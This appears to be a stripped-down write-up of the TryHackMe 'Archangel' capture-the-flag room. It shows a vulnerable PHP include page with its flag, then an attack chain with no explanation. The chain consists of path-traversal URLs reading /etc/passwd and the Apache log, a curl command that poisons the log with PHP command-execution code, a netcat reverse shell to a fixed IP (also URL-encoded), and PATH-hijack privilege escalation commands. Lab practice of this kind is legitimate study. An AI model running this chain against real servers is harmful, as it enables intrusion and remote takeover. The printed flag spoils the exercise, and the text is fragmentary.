Archangel
May 09, 2024
Last updated
May 09, 2024
Last updated
<!DOCTYPE HTML>
<html>
<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>
</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
<?php
//FLAG: thm{explo1t1ng_lf1}
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
if(isset($_GET["view"])){
if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
include $_GET['view'];
}else{
echo 'Sorry, Thats not allowed';
}
}
?>
</div>
</body>
</html>http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//..//etc/passwdhttp://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//..//var/log/apache2/access.logcurl -s 'http://mafialive.thm/test.php' -A '<?php system($_GET['cmd']); ?>'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.193.229 4444 >/tmp/f
%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%39%2e%31%39%33%2e%32%32%39%20%34%34%34%34%20%3e%2f%74%6d%70%2f%66nano cp
cat cp
chmod +x cp
export PATH=/home/archangel:$PATH
echo $PATH
